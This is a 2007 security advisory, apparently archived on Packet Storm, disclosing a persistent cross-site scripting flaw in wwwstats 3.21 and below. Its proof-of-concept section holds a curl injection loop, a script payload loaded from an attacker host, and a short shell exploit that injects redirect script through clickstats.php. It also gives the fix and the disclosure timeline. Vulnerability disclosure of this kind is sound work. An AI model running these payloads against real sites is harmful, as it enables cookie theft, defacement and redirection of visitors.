what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

isaa-2007-004.txt

isaa-2007-004.txt
Posted Dec 8, 2007
Authored by Jesus Olmos Gonzalez

wwwstats versions 3.21 and below suffer from a persistent cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 5457ca069024fd739d38219ac74f191a2708e419d1729044433de62fb2ba630d

isaa-2007-004.txt

Change Mirror Download
=============================================
INTERNET SECURITY AUDITORS ALERT 2007-004
- Original release date: November 7th, 2007
- Last revised: December 7th, 2007
- Discovered by: Jesus Olmos Gonzalez
- Severity: 4/5
=============================================

I. VULNERABILITY
-------------------------
wwwstats is vulnerable to Persistent XSS

II. BACKGROUND
-------------------------
wwwstats is a very widely used Web traffic analyser, that registers in
a database the user agents, referers, downloads, etc ..

III. DESCRIPTION
-------------------------
Is possible to inject HTML and JavaScript to the database by calling
directly the clickstats.php code. This would mean web defacing, steal
admin sessions, web redirecting and WSS Worms.

To bypass the first 'if', is necessary to fill the HTTP Referer field
with something, and inject the link to the database by the link get
parameter.

An attacker can inject using the link parameter or the useragent field
a script which will steal admin's cookies, or make a deface, or
anything else...

If magic quotes are configured at php.ini, there is no problem, in
javascript \'test\' is interpreted as 'test'.

IV. PROOF OF CONCEPT
-------------------------
Controlling the iterations number, is possible to do the injection in
the ranking position you want:

while [ 1 ]; do
curl
'http://web.com/wwwstats/clickstats.php?link=<script>XXXX</scrip>' -e
'xxx'; done

Also is possible to attack by -A 'attack'

A payload can be:

<script scr='http://evilsite.com/XSSWorm.js'></script>


------------Exploit------------
#!/bin/sh
#jolmos (at) isecauditors (dot) com

if [ $# -ne 4 ]
then
echo "Usage: $0 <target>
<html or javascript to inject in downloads> <ranking position>"
echo "Example: $0 http://www.victym.com/wwwstats
<script>window.location="http://www.evilhost.com"</script> 100"
exit
fi

echo 'Attacking, wait a moment'
for i in `seq 1 $3`; do curl "$1/clickstats.php?link=$2" -e 'attack'; done
--------------------------------

V. BUSINESS IMPACT
-------------------------
A deface or redirection can damage the corporation image.

VI. SYSTEMS AFFECTED
-------------------------
wwwstats v3.21 and prior (all)

VII. SOLUTION
-------------------------
Sanitize the inputs. Update to version 3.22.

VIII. REFERENCES
-------------------------
http://www.timeprog.com/wwwstats/

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
November 07, 2007: Initial release
November 09, 2007: Added POC

XI. DISCLOSURE TIMELINE
-------------------------
November 07, 2007: Vulnerability acquired by Jesus Olmos Gonzalez
Internet Security Auditors (www.isecauditors.com)
November 08, 2007: Developer contacted
November 08, 2007: Response and correction started.
November 26, 2007: Update Available.
December 07, 2007: Advisory published.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors, S.L. accepts no responsibility for any
damage caused by the use or misuse of this information.
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close